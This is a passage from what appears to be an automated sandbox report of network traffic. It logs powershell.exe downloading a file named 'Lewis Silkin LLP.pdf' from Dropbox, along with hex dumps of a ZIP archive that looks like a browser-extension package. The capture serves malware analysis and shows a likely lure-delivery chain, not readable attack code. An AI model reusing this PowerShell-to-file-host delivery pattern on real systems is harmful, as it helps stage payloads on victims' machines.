                                                                                                                                                                                                                                                                                              Data Ascii: Jc$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC1390INData Raw: a3 9a c1 c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51 e2 00 5a c4
                                                                                                                                                                                                                                                                                              Data Ascii: C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8QZ
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC1390INData Raw: cb 68 4b 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13 b4 28 e5 ea
                                                                                                                                                                                                                                                                                              Data Ascii: hKn=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2|}nK+,\]Q|Em:aox/cl &ud]p;MJW4M@(
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC1390INData Raw: 98 b9 ab 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7 16 96 fa 98
                                                                                                                                                                                                                                                                                              Data Ascii: cc8*6D*<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC1390INData Raw: f9 39 14 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73 73 61 67 65
                                                                                                                                                                                                                                                                                              Data Ascii: 9o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/message
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC1390INData Raw: 74 6f 40 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: to@Fi'W|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG|P_Cj*B5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6*g Ad/


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              11192.168.2.549739162.125.65.184438496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC246OUTGET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: www.dropbox.com
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:28 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                              Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; font-src https://* data: ; media-src https://* blob: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' [TRUNCATED]
                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                              Location: https://uc48b83ada642288f62fac023367.dl.dropboxusercontent.com/cd/0/get/CgAeYk-ICNxgkqhNRIDHu4dsVrtb8rqKQvyuiDbpB-VdYP-6ND-6fxABcXlB3tMWgAdfASpXTaeR__Vb9ARDsyMetchbpNKDnaLRETh-2t55upVh299KdSqt_bR33vpX5w1Yp9d5_2bhsHbCKA9YhGbE/file?dl=1#
                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                              Set-Cookie: gvc=MTM0Mzc3Mzk1NzA3Mjg4ODQyMzY2NTIyMjUwNjg5MDk3OTQ0OTQ3; Path=/; Expires=Sun, 09 Dec 2029 17:40:27 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: t=dKX_aNGPV8Hy0NRN7Q2q7pbF; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:40:27 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-js_csrf=dKX_aNGPV8Hy0NRN7Q2q7pbF; Path=/; Expires=Wed, 10 Dec 2025 17:40:27 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-ss=D-SZZkUJaM; Path=/; Expires=Wed, 10 Dec 2025 17:40:27 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                              Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:40:27 GMT
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                              Content-Length: 17
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:27 GMT
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: edd0680c3e1244c1a7c1b3ebcbc96215
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:28 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                              Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              12192.168.2.549773162.125.69.154438496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:29 UTC370OUTGET /cd/0/get/CgAeYk-ICNxgkqhNRIDHu4dsVrtb8rqKQvyuiDbpB-VdYP-6ND-6fxABcXlB3tMWgAdfASpXTaeR__Vb9ARDsyMetchbpNKDnaLRETh-2t55upVh299KdSqt_bR33vpX5w1Yp9d5_2bhsHbCKA9YhGbE/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: uc48b83ada642288f62fac023367.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:30 UTC761INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="Lewis Silkin LLP.pdf"; filename*=UTF-8''Lewis%20Silkin%20LLP.pdf
                                                                                                                                                                                                                                                                                              Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                              Etag: 1733684767914485d
                                                                                                                                                                                                                                                                                              Pragma: public
                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                              X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Server-Response-Time: 147
                                                                                                                                                                                                                                                                                              X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:30 GMT
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                              Content-Length: 106848
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: 55185f28389143c296eba6fccde0f7de
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:30 UTC15623INData Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 32 35 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 38 35 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 38 36 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 32 30 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20
                                                                                                                                                                                                                                                                                              Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>endobj3 0 obj<</Type/Page/Parent
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:31 UTC16384INData Raw: 6f b3 05 3c fc 9b b7 28 fc 39 03 da b8 cf 07 d8 da eb fe 02 d3 6f 21 b6 84 6a 9a 74 98 8e 55 01 58 bc 6d 90 09 f4 65 c0 39 f5 ae a6 c3 52 46 f1 be a9 a6 8d bc 5b c3 31 1b b9 dd c8 3c 67 d3 6f 6a d6 12 bd 9b ea 79 98 8a 5e cd ca 9c 2f ee dd 3f 93 df f1 3c f7 e3 3e 96 23 d4 2c 35 45 18 32 c4 60 66 ce 30 54 e4 7e 84 fe 55 d0 7c 1f d4 fe d7 e1 27 b3 63 96 b3 9d 95 46 7f 85 be 61 fa 96 ad 4f 89 9a 48 d5 bc 1d 38 05 44 90 3a ca ac c7 00 73 82 49 f4 c1 27 f0 ae 3f e1 8d 9d f6 87 ae 5f a9 86 69 74 f9 63 da 24 44 24 31 07 28 c3 d8 a9 3c d6 56 71 af 7e 8c f4 95 48 57 ca 7d 9b 7e f4 1e 9f d7 a3 3d 83 b5 79 07 c5 7b 59 34 bf 13 68 de 23 81 4e 63 c0 72 3d 51 83 0f cc 13 f9 57 af a9 dc a0 e0 8c 8e 86 b8 af 8a 5a 57 f6 8f 82 ae 24 45 06 5b 47 59 d7 3e 83 83 fa 12 7f 0a
                                                                                                                                                                                                                                                                                              Data Ascii: o<(9o!jtUXme9RF[1<gojy^/?<>#,5E2`f0T~U|'cFaOH8D:sI'?_itc$D$1(<Vq~HW}~=y{Y4h#Ncr=QWZW$E[GY>
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:31 UTC761INData Raw: cd 31 4a 9c ec 77 4a 46 46 6a 42 cc 0a e5 e7 a9 2b 28 81 25 6c b0 f6 df ea 58 7a 55 9a db 7d 7a fe d9 d3 91 10 f4 c5 e1 ac a7 44 0e 97 9b ad 9a df f7 a5 f4 6a eb a3 14 e7 d5 f7 93 51 18 91 f1 42 81 8c 81 18 74 41 0c 1c 17 06 84 7b 47 a5 f0 d1 c3 dc 63 92 c6 f4 36 16 a5 14 e6 e6 14 67 8c 12 4e 96 75 65 7a 7a 49 71 f1 f0 59 4d bd bf 63 83 af ca f1 16 8f 1d 3e e8 96 de d7 e5 4d 7f 3a f4 19 da 18 37 c9 58 78 ad 31 71 1d 03 17 8d 32 c9 ae c6 ca ae 86 4c cf 98 5e 33 bd 6f 52 62 65 2f 1f d3 89 b8 d4 d4 0c a3 ec a2 37 26 36 d6 b8 42 74 98 6b ef 97 73 ef 24 fa 30 d5 52 d9 5c f1 1e 95 4c 91 fd 60 ab d1 05 6b 37 79 75 d2 fd 8c 17 e0 7c d2 85 ee 6e 1f 95 3a 32 37 77 ac e6 e2 e0 ef b8 e1 55 be eb d6 88 57 b5 bd 93 f8 3a f5 16 4a a2 6a cd 2b e7 b6 84 07 13 f8 f7 62 6f
                                                                                                                                                                                                                                                                                              Data Ascii: 1JwJFFjB+(%lXzU}zDjQBtA{Gc6gNuezzIqYMc>M:7Xx1q2L^3oRbe/7&6Btks$0R\L`k7yu|n:27wUW:Jj+bo
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:31 UTC16384INData Raw: 51 18 94 6c 67 a6 be 6f af d1 66 af 6e e5 a2 55 46 bd de e4 4a ec 37 bc b8 7a 54 d9 a2 cd bd 7b 72 32 37 d7 24 99 8d fd 8c c5 23 86 57 b5 d5 2f ea 92 e3 73 2b f6 d0 16 bc 11 4c 34 56 f3 bb 3f 96 83 49 78 8d de e2 42 a3 b7 a4 b0 de c8 76 18 f7 19 b9 71 43 ac dc 13 2c a7 57 61 d1 48 df b0 6b 07 49 a7 b9 22 43 74 e1 5e 47 79 5e 6d 8b 7b 52 a3 c3 f2 bc 72 57 9b 14 7e 5f 3c a6 2e 26 0b 65 d1 ef 64 4b c1 06 83 3d c4 74 41 55 4d 96 cc 6c ce 08 b1 78 6f a2 31 83 b2 bd d9 dc 9b ed cf de 99 7d 3c 5b c9 4e 90 e2 b8 7a bc fc d6 d3 66 bc d4 54 4a 77 1d 64 03 19 de 11 91 58 61 51 cf 5f 75 7a ca c9 be e9 5b 7e a5 77 32 cb 72 66 65 66 71 1d 67 82 71 9d de d5 df 3a c0 3a d0 2a 74 49 d9 f1 2e 53 76 5a 7a 6a 3a d7 39 94 84 46 b2 e9 32 1a 59 bf 38 a4 52 62 91 ca 62 f6 46 66
                                                                                                                                                                                                                                                                                              Data Ascii: QlgofnUFJ7zT{r27$#W/s+L4V?IxBvqC,WaHkI"Ct^Gy^m{RrW~_<.&edK=tAUMlxo1}<[NzfTJwdXaQ_uz[~w2rfefqgq::*tI.SvZzj:9F2Y8RbbFf
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:31 UTC16125INData Raw: f7 8f f9 69 ff f7 e9 5f 52 2c 56 ca d5 54 17 fe c8 c2 72 fe b5 68 6d 6b ab 7d f5 0f 98 02 f6 af 11 5c 56 a9 d5 4c 41 8f ca 05 b4 ab 70 a0 70 b0 c0 14 7c e0 cf 0b 12 a8 52 a1 5c cd 31 63 03 68 00 ae cd 8a b5 1c 37 7e 32 21 bb 49 e3 77 84 b7 1a 00 92 c5 62 c5 0a 38 a0 46 d3 28 4d 64 b7 29 50 3a 90 46 6b d2 c3 e9 c9 f4 c9 b4 29 6d 83 3d d3 f3 bc 32 6e fc bb ee 04 43 93 be 41 d9 5a d8 aa 6f 3d 84 ef b9 79 2b 1c 1a 12 a5 d2 56 db 81 fb 97 a1 65 84 f1 5a 56 54 bc c8 ee 1d f6 fe 1c 3b 97 fa dc 7f e8 0e 92 e3 22 01 10 f1 92 df e8 ad d3 df d7 5d 0f d6 50 ad 58 60 fa 19 ba 9f 41 14 23 c3 82 74 f8 56 fa c3 25 52 e3 b3 32 f0 f5 00 df a1 f1 14 5c 23 73 f5 96 ad cf a0 1b a9 18 b2 1c d9 0f c3 43 c6 e4 a2 d1 e9 d1 19 d2 98 d6 46 4f cb da c8 fb 64 43 33 26 0e 8f c8 a7 31
                                                                                                                                                                                                                                                                                              Data Ascii: i_R,VTrhmk}\VLApp|R\1ch7~2!Iwb8F(Md)P:Fk)m=2nCAZo=y+VeZVT;"]PX`A#tV%R2\#sCFOdC3&1
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:31 UTC259INData Raw: f7 ca 58 6d ba e2 a5 ab 9f b8 9e cb 59 45 8f dc 9f c0 a3 b9 c1 94 53 f0 cb 3d 3d 15 47 f7 78 c6 ad d1 10 16 36 52 1a c9 c8 23 39 bf d6 ea 30 69 71 07 8c 30 8c 6c b2 2f 9b 1b 91 7d 56 0d 41 5c fa 9a 4e 27 d5 46 05 66 7c 65 05 c7 91 ae 5f 71 f9 97 1a 1c e2 b0 81 1d 6a 0a 1b 64 50 71 8c 38 f0 bd 32 a8 37 1a 58 20 18 04 21 18 b4 f7 2d 2e 9e d2 67 3b 03 29 ca ac 4a 81 54 30 00 e0 d7 6d 94 72 8d c6 ba 2a a8 e6 20 9c be e3 96 a2 68 7d 96 46 01 a2 07 d1 0b 12 8e 2e c0 78 b1 bd fa 09 8c 1a 91 d9 9e 43 0b db 42 f4 00 21 43 2c 18 62 27 af 41 9d d5 10 3a 6e 8b 76 49 5f b8 dc 10 46 aa 1e 21 7e 2f ea ad ae 00 c3 f5 8d 8c 89 2b ef de 98 17 aa 63 ab 57 85 6b 77 d5 58 c1 e7 b6 08 a4 4f 1e 98 39 36 b1 eb b5 93 6b a7 4e bc be 7f 62 77 98 e5 ed 94 56 43 d3 56 8d 80 3f ee 48
                                                                                                                                                                                                                                                                                              Data Ascii: XmYES==Gx6R#90iq0l/}VA\N'Ff|e_qjdPq827X !-.g;)JT0mr* h}F.xCB!C,b'A:nvI_F!~/+cWkwXO96kNbwVCV?H
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:31 UTC16384INData Raw: c9 db 1a b7 3d bb 7f eb c9 dd fd 11 6b ac c0 44 63 29 8f d3 56 1b 1a ae 89 63 0f 9e 3d 78 f3 0f 4f 4d 85 ac 94 49 8f 6b ac 41 1f 92 52 2f 94 d2 4d 10 5b 7e ac 88 ed 68 72 27 d2 a0 96 06 d5 d4 23 29 bc 16 05 0f 19 c1 08 09 86 09 30 84 03 2d a2 4b c0 96 08 26 1e 4b 3c 9d d0 24 12 ae b2 9f 2e 8a 2e 5e 90 68 de 4a 15 65 c9 c7 63 cb 41 06 e4 f9 f7 d5 71 83 33 f3 4b 19 8a 85 b0 01 e1 68 79 d8 0f 54 2a 68 da 20 82 d5 b8 e3 f1 f7 1e 1b b6 25 46 ca bd 77 1c bd b3 a1 6c 49 75 05 4c 36 a1 1c 01 35 4a 4c ca 6e df f4 cc 96 95 f2 c0 ad 4f 6f b1 c6 62 12 45 5c 58 75 ff 37 67 22 3b f6 ed 4e 40 d1 d6 88 96 60 21 82 1f 4d 77 05 8d c2 a5 9b 08 bd 96 b0 46 1a db 1e dc b0 ef 99 23 75 40 10 00 a2 a2 04 65 6a 2f 6c 77 11 bb a1 59 8e 48 a2 d5 6a a7 69 11 ad 7c 12 14 81 28 a6 cb
                                                                                                                                                                                                                                                                                              Data Ascii: =kDc)Vc=xOMIkAR/M[~hr'#)0-K&K<$..^hJecAq3KhyT*h %FwlIuL65JLnOobE\Xu7g";N@`!MwF#u@ej/lwYHji|(
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:31 UTC16384INData Raw: 27 cb 47 8c 2b bd b6 b1 c2 c6 78 e6 d3 8c 29 7d 26 4e 2d e8 77 c3 63 75 f7 23 ef 3c d4 aa a9 5b 54 db dc fc 4a 9a 91 b1 a6 32 c6 d4 cc ba 95 2d de dd cd 6f 0e 60 ec e6 cd 8c e9 1f 9a d7 3c 7f d1 fa 77 d5 41 8c 2d a9 67 cc 16 98 df 74 fa bc d7 ca 77 14 32 b6 6d 14 63 f6 0f 1a 1b 6a eb 3b 0f df f3 1a da b3 a2 bd 81 8d 70 d8 ee 49 3f 88 34 da 63 59 8d 8b 5a 56 0f 1b 63 3c 84 f4 47 8c 2d 9c d9 b4 a4 ae b6 ed c8 a6 53 18 db d5 9b b1 41 86 45 b5 ab 9b f3 17 65 ff 09 f9 8d 28 ef 5d d4 d0 52 7b ed d9 5b 57 32 de 7d 2f d2 e7 2c ae 5d d4 e0 8a bf 70 05 63 9f e1 99 7d 5a 9a 97 2c 6f e9 72 b3 8d 18 cf 9d a2 7c f3 b2 86 e6 db 7f 58 f0 08 63 6b 2f c6 e3 be 67 62 2e 0c 23 2e 5a 18 77 f5 b7 73 ec 43 bf 66 a9 26 26 ec c1 4f d6 3e 27 f8 9d ef 6e 7d f2 87 43 47 5a e3 3e 35
                                                                                                                                                                                                                                                                                              Data Ascii: 'G+x)}&N-wcu#<[TJ2-o`<wA-gtw2mcj;pI?4cYZVc<G-SAEe(]R{[W2}/,]pc}Z,or|Xck/gb.#.ZwsCf&&O>'n}CGZ>5
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:31 UTC8544INData Raw: 1d 4b 08 48 1c 19 42 6c 58 e3 d4 c8 32 a0 b4 fc cb 65 7b 3a 6f eb eb 54 26 bf d8 7a eb 67 67 eb 34 2d 5b e9 5b 35 62 d4 8d 76 e5 bd a2 12 5a f7 fd ce 67 e4 cf 6f 3b 6f 38 32 89 27 5c b4 6a e6 2f 61 da 81 7d 3c 9e 76 d9 ea d5 e2 cd e0 fc 4b d1 1b 84 e1 75 ee 26 8c 9f a0 71 1e b3 fe cc 45 e5 5a e1 05 c1 98 b0 77 b7 d3 56 ae 39 b7 78 a2 f5 51 ff e3 d7 fc 44 1d 16 0e b2 4f 7c b3 f3 85 de f9 4b f1 b9 21 5d 0f 2e 90 5d 59 39 e4 a8 5b 16 e7 89 a7 62 77 95 6d d9 88 3e 5b 4f da 46 ba f6 9b 32 ee 6a b6 57 72 ee b1 79 0d 1b f4 ef f7 8d ac cc e1 d9 77 69 97 0e ec 55 e7 df bc b8 2d db e3 f9 e2 62 a7 c7 64 b1 d3 23 a3 79 f9 7c ae b8 d8 e9 1a b4 5d ae 71 36 75 3a 06 4d 87 79 5c fe 87 67 d3 62 6e aa a5 8d c1 9d 8e 70 3c 2d e6 86 83 6d bb 42 47 47 88 67 96 f4 a8 0c 6b 3e
                                                                                                                                                                                                                                                                                              Data Ascii: KHBlX2e{:oT&zgg4-[[5bvZgo;o82'\j/a}<vKu&qEZwV9xQDO|K!].]Y9[bwm>[OF2jWrywiU-bd#y|]q6u:My\gbnp<-mBGGgk>


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              13192.168.2.549795162.125.65.184438496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
